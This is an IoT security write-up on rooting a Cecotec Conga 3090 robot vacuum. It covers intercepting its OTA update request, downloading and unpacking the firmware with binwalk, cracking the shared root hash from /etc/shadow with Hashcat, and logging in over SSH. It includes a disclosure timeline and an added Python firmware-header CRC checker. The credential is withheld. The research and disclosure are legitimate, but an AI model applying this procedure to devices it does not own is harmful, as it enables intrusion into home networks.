Hack your vacuum. Are we safe on IoT Things?

IoT devices are filling our houses these days: so many Christmas gifts that can help us in our daily tasks, like remotely watching your baby or your pets, turning on the air conditioning or keeping the floor clean. But… are these devices safe to use on our home network? Can someone hack my vacuum?

Let’s take a look at a very common device: the Cecotec Conga 3090. It has had many sales (and many returns) and has now been replaced by the new model, the 3490.

Today’s victim: Conga 3090

Conga 3090

This model was the Cecotec flagship until the 4090 was released, and with a price of 350-400€ it had a great impact on the robot vacuum market.

Reconnaissance

Let’s check at first sight what it exposes on our LAN:

a really sweet ssh port there

It exposes a DNS service (dnsmasq) and an SSH port (Dropbear), so we need more information to get in there.

We now switch to Burp Suite to set up an HTTP(S) proxy, route all the phone’s traffic through it and see what the app can tell us. (You can follow a tutorial for this here.)

Aaaaand surprise: we get a GET request checking whether there is an update available for our product, asking for the package ramdisk_sys. That’s a good entry point! So let’s forward this request to Repeater and check the parameters:

GET /device_update?product=CECOTECCRL20A-Release&version=S1.2.38&sn=<HereGoesASerialNumber>&pkg_name=ramdisk_sys HTTP/1.1
Host: eu.ota.3irobotics.net:5000
Accept: */*
User-Agent: SCCRobot/2.2.0 (es.cecotec.s3090v1; build:1; iOS 13.3.0) Alamofire/4.7.3
Accept-Language: es-ES;q=1.0
Accept-Encoding: gzip, deflate
Connection: close

This request gives us an HTTP 200 OK but an empty JSON body ({}), so maybe that’s because we already have the latest version installed? Let’s try lowering the version to 1.2.34.

Voilà, we now have the URI of the ramdisk package. Let’s download it and inspect it:

christian@kali:~/cecotec$ wget http://eu.ota.3irobotics.net:5000/static/ota_packages/CECOTECCRL20A-Release/S1.2.38/ramdisk_sys.tar.gz
Resolviendo eu.ota.3irobotics.net (eu.ota.3irobotics.net)… 47.91.94.73, 47.254.145.60, 47.91.87.185
Conectando con eu.ota.3irobotics.net (eu.ota.3irobotics.net)[47.91.94.73]:5000… conectado.
Petición HTTP enviada, esperando respuesta… 200 OK
Longitud: 23422553 (22M) [application/x-tar]
Grabando a: “ramdisk_sys.tar.gz”
ramdisk_sys.tar.gz                 100%[=============================================================>]  22,34M  1,03MB/s    en 21s
2020-01-05 13:43:06 (1,06 MB/s) - “ramdisk_sys.tar.gz” guardado [23422553/23422553]
christian@kali:~/cecotec$ tar -xzvf ramdisk_sys.tar.gz
ramdisk_sys/
ramdisk_sys/boot_initramfs.img.md5
ramdisk_sys/boot_initramfs.img
christian@kali:~/cecotec$ cd ramdisk_sys/
christian@kali:~/cecotec/ramdisk_sys$ ls -lah
total 33M
drwxr-xr-x 2 christian christian 4,0K sep 17 12:33 .
drwxr-xr-x 3 christian christian 4,0K ene  5 13:43 ..
-rw-r--r-- 1 christian christian  32M sep 17 12:33 boot_initramfs.img
-rw-r--r-- 1 christian christian   33 sep 17 12:33 boot_initramfs.img.md5

Nice! It looks like we have a 32 MB initramfs image, so it’s time to let binwalk do its job:

christian@kali:~/cecotec/ramdisk_sys$ binwalk boot_initramfs.img

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
82432         0x14200         uImage header, header size: 64 bytes, header CRC: 0x9D836DC1, created: 2018-09-30 01:28:12, image size: 23381900 bytes, Data Address: 0x40008000, Entry Point: 0x40008000, data CRC: 0x8CA6E59A, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name: "ARM OpenWrt Linux-3.4.39"
82496         0x14240         Linux kernel ARM boot executable zImage (little-endian)
98643         0x18153         gzip compressed data, maximum compression, from Unix, last modified: 1970-01-01 00:00:00 (null date)
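As an added example (not code from the original post), here is a small Python parser for the uImage header that binwalk identified at 0x14200: it decodes the same fields binwalk printed and recomputes the header and data CRC32s that U-Boot itself verifies, a cheap integrity check worth running on any image fetched over plain HTTP with only an .md5 sidecar. The sample image, its offset and its metadata are constructed here to mirror the binwalk output above; the real firmware’s CRC values are not reproduced.

```python
import struct
import zlib
from datetime import datetime, timezone

UIMAGE_MAGIC = 0x27051956
HEADER_FMT = ">IIIIIIIBBBB32s"            # every field big-endian, 64 bytes in total
HEADER_LEN = struct.calcsize(HEADER_FMT)
# U-Boot enum values for the fields binwalk printed symbolically
OS_NAMES, ARCH_NAMES = {5: "Linux"}, {2: "ARM"}
TYPE_NAMES, COMP_NAMES = {2: "OS Kernel Image"}, {0: "none", 1: "gzip"}

def find_uimage(blob):
    """Offset of the first uImage magic (what binwalk reports), or -1."""
    return blob.find(struct.pack(">I", UIMAGE_MAGIC))

def parse_uimage(blob, offset):
    """Decode the 64-byte header at offset and recompute both CRCs U-Boot verifies."""
    raw = blob[offset:offset + HEADER_LEN]
    (magic, hcrc, time_, size, load, ep, dcrc,
     os_, arch, type_, comp, name) = struct.unpack(HEADER_FMT, raw)
    if magic != UIMAGE_MAGIC:
        raise ValueError("no uImage magic at offset 0x%x" % offset)
    hdr_zeroed = raw[:4] + b"\0" * 4 + raw[8:]     # header CRC is taken with ih_hcrc = 0
    data = blob[offset + HEADER_LEN:offset + HEADER_LEN + size]
    return {
        "offset": offset,
        "created": datetime.fromtimestamp(time_, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "image_size": size, "data_address": load, "entry_point": ep,
        "os": OS_NAMES.get(os_, os_), "cpu": ARCH_NAMES.get(arch, arch),
        "image_type": TYPE_NAMES.get(type_, type_), "compression": COMP_NAMES.get(comp, comp),
        "name": name.rstrip(b"\0").decode("ascii", "replace"),
        "header_crc_ok": zlib.crc32(hdr_zeroed) == hcrc,
        "data_crc_ok": len(data) == size and zlib.crc32(data) == dcrc,
    }

def build_uimage(payload, name, created, load=0x40008000, ep=0x40008000):
    """Assemble a valid Linux/ARM kernel uImage; only used to construct the sample below."""
    body = struct.pack(HEADER_FMT, UIMAGE_MAGIC, 0, created, len(payload), load, ep,
                       zlib.crc32(payload), 5, 2, 2, 0, name.encode())
    return body[:4] + struct.pack(">I", zlib.crc32(body)) + body[8:] + payload

# Constructed sample (not the real firmware): zero padding up to the offset binwalk
# reported (0x14200), then a tiny kernel-like image whose metadata mirrors the page.
SAMPLE_TIME = int(datetime(2018, 9, 30, 1, 28, 12, tzinfo=timezone.utc).timestamp())
SAMPLE = bytes(0x14200) + build_uimage(b"\xe3\xa0\x00\x00" * 256, "ARM OpenWrt Linux-3.4.39", SAMPLE_TIME)

if __name__ == "__main__":
    info = parse_uimage(SAMPLE, find_uimage(SAMPLE))
    for key, val in info.items():
        print("%-14s %s" % (key, hex(val) if key in ("offset", "data_address", "entry_point") else val))
```

To check a downloaded boot_initramfs.img, read it into `blob` and pass `find_uimage(blob)` to `parse_uimage`; a False in either CRC field means the image was corrupted or altered in transit.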

Gaining access

We discovered that OpenWrt is the OS running inside the vacuum, so we will try to decompress the image and look for interesting data inside, starting by re-launching binwalk with --matryoshka and rubbing your hands together while watching the entire file system decompress.

Even with a very quick look, you will surely have seen a very interesting file: ./<folders>/etc/shadow, which contains the root password hash. (NOTE: to keep things a bit secure, I’m not going to post the password hash or the password itself.)

our first prize today

And… well… it’s an MD5 hash, and if we have a good video card in our system we can switch to Hashcat, using -m 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)) and our favourite dictionary (like the CrackStation one), or an online service like OnlineHashCrack.

Now that we have that sweet password, let’s try to SSH in:

christian@kali:~$ ssh root@192.168.1.64
root@192.168.1.64's password: 


BusyBox v1.24.1 () built-in shell (ash)

 _____  _              __     _
|_   _||_| ___  _ _   |  |   |_| ___  _ _  _ _
  | |   _ |   ||   |  |  |__ | ||   || | ||_'_|
  | |  | || | || _ |  |_____||_||_|_||___||_,_|
  |_|  |_||_|_||_|_|  Tina is Based on OpenWrt!
 ----------------------------------------------
 Tina Linux (Neptune, 57513AA3)
 ----------------------------------------------
root@TinaLinux:~# 

We’re in!!! Now I really beg you to change your vacuum’s root password every time it gets an update, because that password is the same on all Cecotec Conga 3090 units: anyone who gets access to your Wi-Fi can hack your vacuum and install any persistence module there!

Timeline:

19/09/2019: Bug discovered
20/09/2019: Bug communicated by mail to Cecotec España
23/09/2019: Small conference with Cecotec IT Team
05/01/2020: This little guide came out
